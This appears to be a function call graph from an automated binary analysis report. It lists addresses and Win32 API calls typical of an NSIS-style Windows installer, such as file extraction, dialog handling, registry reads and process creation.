25 API calls 4838->4839 4840 407244 4839->4840 4841 4023a7 4840->4841 4842 40724e lstrcpynW lstrcmpW 4840->4842 4843 407280 4842->4843 4844 407286 lstrcpynW 4842->4844 4843->4844 4844->4841 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 
3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4845 402797 4846 40145c 18 API calls 4845->4846 4847 4027ae 4846->4847 4848 40145c 18 API calls 4847->4848 4849 4027b7 4848->4849 4850 40145c 18 API calls 4849->4850 4851 4027c0 GetPrivateProfileStringW lstrcmpW 4850->4851 4852 401e9a 4853 40145c 18 API calls 4852->4853 4854 401ea1 4853->4854 4855 401446 18 API calls 4854->4855 4856 401eab wsprintfW 4855->4856 3816 401a1f 3817 40145c 18 API calls 3816->3817 3818 401a26 3817->3818 3819 4062cf 11 API calls 3818->3819 3820 401a49 3819->3820 3821 401a64 3820->3821 3822 401a5c 3820->3822 3891 406035 lstrcpynW 3821->3891 3890 406035 lstrcpynW 3822->3890 3825 401a6f 3892 40674e lstrlenW CharPrevW 3825->3892 3826 401a62 3829 406064 5 API calls 3826->3829 3860 401a81 3829->3860 3830 406301 2 API calls 3830->3860 3833 401a98 CompareFileTime 3833->3860 3834 401ba9 3835 404f9e 25 API calls 3834->3835 3837 401bb3 3835->3837 3836 401b5d 3838 404f9e 25 API calls 3836->3838 3869 40337f 3837->3869 3840 401b70 3838->3840 3844 4062cf 11 API calls 3840->3844 3842 406035 lstrcpynW 3842->3860 3843 4062cf 11 API calls 3845 401bda 3843->3845 3849 401b8b 3844->3849 3846 401be9 SetFileTime 3845->3846 3847 401bf8 CloseHandle 3845->3847 3846->3847 3847->3849 3850 401c09 3847->3850 3848 406831 18 API calls 3848->3860 3851 401c21 3850->3851 3852 401c0e 3850->3852 3853 406831 18 API calls 3851->3853 3854 406831 18 API calls 3852->3854 3855 401c29 3853->3855 3857 401c16 lstrcatW 3854->3857 3858 4062cf 11 API calls 3855->3858 3857->3855 3861 401c34 3858->3861 3859 401b50 3863 401b93 3859->3863 3864 401b53 
3859->3864 3860->3830 3860->3833 3860->3834 3860->3836 3860->3842 3860->3848 3860->3859 3862 4062cf 11 API calls 3860->3862 3868 405e7c GetFileAttributesW CreateFileW 3860->3868 3895 405e5c GetFileAttributesW 3860->3895 3898 405ccc 3860->3898 3865 405ccc MessageBoxIndirectW 3861->3865 3862->3860 3866 4062cf 11 API calls 3863->3866 3867 4062cf 11 API calls 3864->3867 3865->3849 3866->3849 3867->3836 3868->3860 3870 40339a 3869->3870 3871 4033c7 3870->3871 3904 403368 SetFilePointer 3870->3904 3902 403336 ReadFile 3871->3902 3875 401bc6 3875->3843 3876 403546 3878 40354a 3876->3878 3879 40356e 3876->3879 3877 4033eb GetTickCount 3877->3875 3882 403438 3877->3882 3880 403336 ReadFile 3878->3880 3879->3875 3883 403336 ReadFile 3879->3883 3884 40358d WriteFile 3879->3884 3880->3875 3881 403336 ReadFile 3881->3882 3882->3875 3882->3881 3886 40348a GetTickCount 3882->3886 3887 4034af MulDiv wsprintfW 3882->3887 3889 4034f3 WriteFile 3882->3889 3883->3879 3884->3875 3885 4035a1 3884->3885 3885->3875 3885->3879 3886->3882 3888 404f9e 25 API calls 3887->3888 3888->3882 3889->3875 3889->3882 3890->3826 3891->3825 3893 401a75 lstrcatW 3892->3893 3894 40676b lstrcatW 3892->3894 3893->3826 3894->3893 3896 405e79 3895->3896 3897 405e6b SetFileAttributesW 3895->3897 3896->3860 3897->3896 3899 405ce1 3898->3899 3900 405d2f 3899->3900 3901 405cf7 MessageBoxIndirectW 3899->3901 3900->3860 3901->3900 3903 403357 3902->3903 3903->3875 3903->3876 3903->3877 3904->3871 4857 40209f GetDlgItem GetClientRect 4858 40145c 18 API calls 4857->4858 4859 4020cf LoadImageW SendMessageW 4858->4859 4860 4030e3 4859->4860 4861 4020ed DeleteObject 4859->4861 4861->4860 4862 402b9f 4863 401446 18 API calls 4862->4863 4867 402ba7 4863->4867 4864 402c4a 4865 402bdf ReadFile 4865->4867 4874 402c3d 4865->4874 4866 401446 18 API calls 4866->4874 4867->4864 4867->4865 4868 402c06 MultiByteToWideChar 4867->4868 4869 402c3f 4867->4869 4870 402c4f 4867->4870 4867->4874 4868->4867 4868->4870 4875 405f7d 
wsprintfW 4869->4875 4872 402c6b SetFilePointer 4870->4872 4870->4874 4872->4874 4873 402d17 ReadFile 4873->4874 4874->4864 4874->4866 4874->4873 4875->4864 4876 402b23 GlobalAlloc 4877 402b39 4876->4877 4878 402b4b 4876->4878 4879 401446 18 API calls 4877->4879 4880 40145c 18 API calls 4878->4880 4882 402b41 4879->4882 4881 402b52 WideCharToMultiByte lstrlenA 4880->4881 4881->4882 4883 402b84 WriteFile 4882->4883 4884 402b93 4882->4884 4883->4884 4885 402384 GlobalFree 4883->4885 4885->4884 4887 4040a3 4888 4040b0 lstrcpynW lstrlenW 4887->4888 4889 4040ad 4887->4889 4889->4888 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 
3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 
403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 
406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW 
SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4890 402da5 4891 4030e3 4890->4891 4892 402dac 4890->4892 4893 401446 18 API calls 4892->4893 4894 402db8 4893->4894 4895 402dbf SetFilePointer 4894->4895 4895->4891 4896 402dcf 4895->4896 4896->4891 4898 405f7d wsprintfW 4896->4898 4898->4891 4899 4049a8 GetDlgItem GetDlgItem 4900 4049fe 7 API calls 4899->4900 4905 404c16 4899->4905 4901 404aa2 DeleteObject 4900->4901 4902 404a96 SendMessageW 4900->4902 4903 404aad 4901->4903 4902->4901 4906 404ae4 4903->4906 4909 
406831 18 API calls 4903->4909 4904 404cfb 4907 404da0 4904->4907 4908 404c09 4904->4908 4913 404d4a SendMessageW 4904->4913 4905->4904 4917 40487a 5 API calls 4905->4917 4930 404c86 4905->4930 4912 403d6b 19 API calls 4906->4912 4910 404db5 4907->4910 4911 404da9 SendMessageW 4907->4911 4914 403df6 8 API calls 4908->4914 4915 404ac6 SendMessageW SendMessageW 4909->4915 4922 404dc7 ImageList_Destroy 4910->4922 4923 404dce 4910->4923 4928 404dde 4910->4928 4911->4910 4918 404af8 4912->4918 4913->4908 4920 404d5f SendMessageW 4913->4920 4921 404f97 4914->4921 4915->4903 4916 404ced SendMessageW 4916->4904 4917->4930 4924 403d6b 19 API calls 4918->4924 4919 404f48 4919->4908 4929 404f5d ShowWindow GetDlgItem ShowWindow 4919->4929 4925 404d72 4920->4925 4922->4923 4926 404dd7 GlobalFree 4923->4926 4923->4928 4932 404b09 4924->4932 4934 404d83 SendMessageW 4925->4934 4926->4928 4927 404bd6 GetWindowLongW SetWindowLongW 4931 404bf0 4927->4931 4928->4919 4933 40141d 80 API calls 4928->4933 4943 404e10 4928->4943 4929->4908 4930->4904 4930->4916 4935 404bf6 ShowWindow 4931->4935 4936 404c0e 4931->4936 4932->4927 4938 404b65 SendMessageW 4932->4938 4939 404bd0 4932->4939 4941 404b93 SendMessageW 4932->4941 4942 404ba7 SendMessageW 4932->4942 4933->4943 4934->4907 4950 403dc4 SendMessageW 4935->4950 4951 403dc4 SendMessageW 4936->4951 4938->4932 4939->4927 4939->4931 4941->4932 4942->4932 4944 404e54 4943->4944 4947 404e3e SendMessageW 4943->4947 4945 404f1f InvalidateRect 4944->4945 4949 404ecd SendMessageW SendMessageW 4944->4949 4945->4919 4946 404f35 4945->4946 4948 4043d9 21 API calls 4946->4948 4947->4944 4948->4919 4949->4944 4950->4908 4951->4905 4952 4030a9 SendMessageW 4953 4030c2 InvalidateRect 4952->4953 4954 4030e3 4952->4954 4953->4954 3905 4038af #17 SetErrorMode OleInitialize 3906 406328 3 API calls 3905->3906 3907 4038f2 SHGetFileInfoW 3906->3907 3979 406035 lstrcpynW 3907->3979 3909 40391d GetCommandLineW 3980 406035 lstrcpynW 3909->3980 3911 40392f 
GetModuleHandleW 3912 403947 3911->3912 3913 405d32 CharNextW 3912->3913 3914 403956 CharNextW 3913->3914 3925 403968 3914->3925 3915 403a02 3916 403a21 GetTempPathW 3915->3916 3981 4037f8 3916->3981 3918 403a37 3920 403a3b GetWindowsDirectoryW lstrcatW 3918->3920 3921 403a5f DeleteFileW 3918->3921 3919 405d32 CharNextW 3919->3925 3923 4037f8 11 API calls 3920->3923 3989 4035b3 GetTickCount GetModuleFileNameW 3921->3989 3926 403a57 3923->3926 3924 403a73 3927 403af8 3924->3927 3929 405d32 CharNextW 3924->3929 3965 403add 3924->3965 3925->3915 3925->3919 3932 403a04 3925->3932 3926->3921 3926->3927 4074 403885 3927->4074 3933 403a8a 3929->3933 4081 406035 lstrcpynW 3932->4081 3944 403b23 lstrcatW lstrcmpiW 3933->3944 3945 403ab5 3933->3945 3934 403aed 3937 406113 9 API calls 3934->3937 3935 403bfa 3938 403c7d 3935->3938 3940 406328 3 API calls 3935->3940 3936 403b0d 3939 405ccc MessageBoxIndirectW 3936->3939 3937->3927 3941 403b1b ExitProcess 3939->3941 3943 403c09 3940->3943 3947 406328 3 API calls 3943->3947 3944->3927 3946 403b3f CreateDirectoryW SetCurrentDirectoryW 3944->3946 4082 4067aa 3945->4082 3949 403b62 3946->3949 3950 403b57 3946->3950 3951 403c12 3947->3951 4099 406035 lstrcpynW 3949->4099 4098 406035 lstrcpynW 3950->4098 3955 406328 3 API calls 3951->3955 3958 403c1b 3955->3958 3957 403b70 4100 406035 lstrcpynW 3957->4100 3959 403c69 ExitWindowsEx 3958->3959 3964 403c29 GetCurrentProcess 3958->3964 3959->3938 3963 403c76 3959->3963 3960 403ad2 4097 406035 lstrcpynW 3960->4097 3966 40141d 80 API calls 3963->3966 3968 403c39 3964->3968 4017 405958 3965->4017 3966->3938 3967 406831 18 API calls 3969 403b98 DeleteFileW 3967->3969 3968->3959 3970 403ba5 CopyFileW 3969->3970 3976 403b7f 3969->3976 3970->3976 3971 403bee 3972 406c94 42 API calls 3971->3972 3974 403bf5 3972->3974 3973 406c94 42 API calls 3973->3976 3974->3927 3975 406831 18 API calls 3975->3976 3976->3967 3976->3971 3976->3973 3976->3975 3978 403bd9 CloseHandle 3976->3978 4101 405c6b 
CreateProcessW 3976->4101 3978->3976 3979->3909 3980->3911 3982 406064 5 API calls 3981->3982 3983 403804 3982->3983 3984 40380e 3983->3984 3985 40674e 3 API calls 3983->3985 3984->3918 3986 403816 CreateDirectoryW 3985->3986 3987 405eab 2 API calls 3986->3987 3988 40382a 3987->3988 3988->3918 4104 405e7c GetFileAttributesW CreateFileW 3989->4104 3991 4035f3 4011 403603 3991->4011 4105 406035 lstrcpynW 3991->4105 3993 403619 4106 40677d lstrlenW 3993->4106 3997 40362a GetFileSize 3998 403726 3997->3998 4012 403641 3997->4012 4111 4032d2 3998->4111 4000 40372f 4002 40376b GlobalAlloc 4000->4002 4000->4011 4123 403368 SetFilePointer 4000->4123 4001 403336 ReadFile 4001->4012 4122 403368 SetFilePointer 4002->4122 4005 4037e9 4008 4032d2 6 API calls 4005->4008 4006 403786 4009 40337f 33 API calls 4006->4009 4007 40374c 4010 403336 ReadFile 4007->4010 4008->4011 4015 403792 4009->4015 4014 403757 4010->4014 4011->3924 4012->3998 4012->4001 4012->4005 4012->4011 4013 4032d2 6 API calls 4012->4013 4013->4012 4014->4002 4014->4011 4015->4011 4015->4015 4016 4037c0 SetFilePointer 4015->4016 4016->4011 4018 406328 3 API calls 4017->4018 4019 40596c 4018->4019 4020 405972 4019->4020 4021 405984 4019->4021 4137 405f7d wsprintfW 4020->4137 4022 405eff 3 API calls 4021->4022 4023 4059b5 4022->4023 4025 4059d4 lstrcatW 4023->4025 4027 405eff 3 API calls 4023->4027 4026 405982 4025->4026 4128 403ec1 4026->4128 4027->4025 4030 4067aa 18 API calls 4031 405a06 4030->4031 4032 405a9c 4031->4032 4034 405eff 3 API calls 4031->4034 4033 4067aa 18 API calls 4032->4033 4035 405aa2 4033->4035 4036 405a38 4034->4036 4037 405ab2 4035->4037 4038 406831 18 API calls 4035->4038 4036->4032 4040 405a5b lstrlenW 4036->4040 4043 405d32 CharNextW 4036->4043 4039 405ad2 LoadImageW 4037->4039 4139 403ea0 4037->4139 4038->4037 4041 405b92 4039->4041 4042 405afd RegisterClassW 4039->4042 4044 405a69 lstrcmpiW 4040->4044 4045 405a8f 4040->4045 4049 40141d 80 API calls 4041->4049 4047 405b9c 4042->4047 
4048 405b45 SystemParametersInfoW CreateWindowExW 4042->4048 4050 405a56 4043->4050 4044->4045 4051 405a79 GetFileAttributesW 4044->4051 4053 40674e 3 API calls 4045->4053 4047->3934 4048->4041 4054 405b98 4049->4054 4050->4040 4055 405a85 4051->4055 4052 405ac8 4052->4039 4056 405a95 4053->4056 4054->4047 4057 403ec1 19 API calls 4054->4057 4055->4045 4058 40677d 2 API calls 4055->4058 4138 406035 lstrcpynW 4056->4138 4060 405ba9 4057->4060 4058->4045 4061 405bb5 ShowWindow LoadLibraryW 4060->4061 4062 405c38 4060->4062 4063 405bd4 LoadLibraryW 4061->4063 4064 405bdb GetClassInfoW 4061->4064 4065 405073 83 API calls 4062->4065 4063->4064 4066 405c05 DialogBoxParamW 4064->4066 4067 405bef GetClassInfoW RegisterClassW 4064->4067 4068 405c3e 4065->4068 4071 40141d 80 API calls 4066->4071 4067->4066 4069 405c42 4068->4069 4070 405c5a 4068->4070 4069->4047 4073 40141d 80 API calls 4069->4073 4072 40141d 80 API calls 4070->4072 4071->4047 4072->4047 4073->4047 4075 40389d 4074->4075 4076 40388f CloseHandle 4074->4076 4146 403caf 4075->4146 4076->4075 4081->3916 4199 406035 lstrcpynW 4082->4199 4084 4067bb 4085 405d85 4 API calls 4084->4085 4086 4067c1 4085->4086 4087 406064 5 API calls 4086->4087 4094 403ac3 4086->4094 4090 4067d1 4087->4090 4088 406809 lstrlenW 4089 406810 4088->4089 4088->4090 4092 40674e 3 API calls 4089->4092 4090->4088 4091 406301 2 API calls 4090->4091 4090->4094 4095 40677d 2 API calls 4090->4095 4091->4090 4093 406816 GetFileAttributesW 4092->4093 4093->4094 4094->3927 4096 406035 lstrcpynW 4094->4096 4095->4088 4096->3960 4097->3965 4098->3949 4099->3957 4100->3976 4102 405ca6 4101->4102 4103 405c9a CloseHandle 4101->4103 4102->3976 4103->4102 4104->3991 4105->3993 4107 40678c 4106->4107 4108 406792 CharPrevW 4107->4108 4109 40361f 4107->4109 4108->4107 4108->4109 4110 406035 lstrcpynW 4109->4110 4110->3997 4112 4032f3 4111->4112 4113 4032db 4111->4113 4116 403303 GetTickCount 4112->4116 4117 4032fb 4112->4117 4114 4032e4 DestroyWindow 
4113->4114 4115 4032eb 4113->4115 4114->4115 4115->4000 4119 403311 CreateDialogParamW ShowWindow 4116->4119 4120 403334 4116->4120 4124 40635e 4117->4124 4119->4120 4120->4000 4122->4006 4123->4007 4125 40637b PeekMessageW 4124->4125 4126 406371 DispatchMessageW 4125->4126 4127 403301 4125->4127 4126->4125 4127->4000 4129 403ed5 4128->4129 4144 405f7d wsprintfW 4129->4144 4131 403f49 4132 406831 18 API calls 4131->4132 4133 403f55 SetWindowTextW 4132->4133 4134 403f70 4133->4134 4135 403f8b 4134->4135 4136 406831 18 API calls 4134->4136 4135->4030 4136->4134 4137->4026 4138->4032 4145 406035 lstrcpynW 4139->4145 4141 403eb4 4142 40674e 3 API calls 4141->4142 4143 403eba lstrcatW 4142->4143 4143->4052 4144->4131 4145->4141 4147 403cbd 4146->4147 4148 4038a2 4147->4148 4149 403cc2 FreeLibrary GlobalFree 4147->4149 4150 406cc7 4148->4150 4149->4148 4149->4149 4151 4067aa 18 API calls 4150->4151 4152 406cda 4151->4152 4153 406ce3 DeleteFileW 4152->4153 4154 406cfa 4152->4154 4193 4038ae CoUninitialize 4153->4193 4155 406e77 4154->4155 4197 406035 lstrcpynW 4154->4197 4161 406301 2 API calls 4155->4161 4181 406e84 4155->4181 4155->4193 4157 406d25 4158 406d39 4157->4158 4159 406d2f lstrcatW 4157->4159 4162 40677d 2 API calls 4158->4162 4160 406d3f 4159->4160 4164 406d4f lstrcatW 4160->4164 4166 406d57 lstrlenW FindFirstFileW 4160->4166 4163 406e90 4161->4163 4162->4160 4167 40674e 3 API calls 4163->4167 4163->4193 4164->4166 4165 4062cf 11 API calls 4165->4193 4170 406e67 4166->4170 4194 406d7e 4166->4194 4168 406e9a 4167->4168 4171 4062cf 11 API calls 4168->4171 4169 405d32 CharNextW 4169->4194 4170->4155 4172 406ea5 4171->4172 4173 405e5c 2 API calls 4172->4173 4174 406ead RemoveDirectoryW 4173->4174 4178 406ef0 4174->4178 4179 406eb9 4174->4179 4175 406e44 FindNextFileW 4177 406e5c FindClose 4175->4177 4175->4194 4177->4170 4180 404f9e 25 API calls 4178->4180 4179->4181 4182 406ebf 4179->4182 4180->4193 4181->4165 4184 4062cf 11 API calls 4182->4184 4183 4062cf 11 
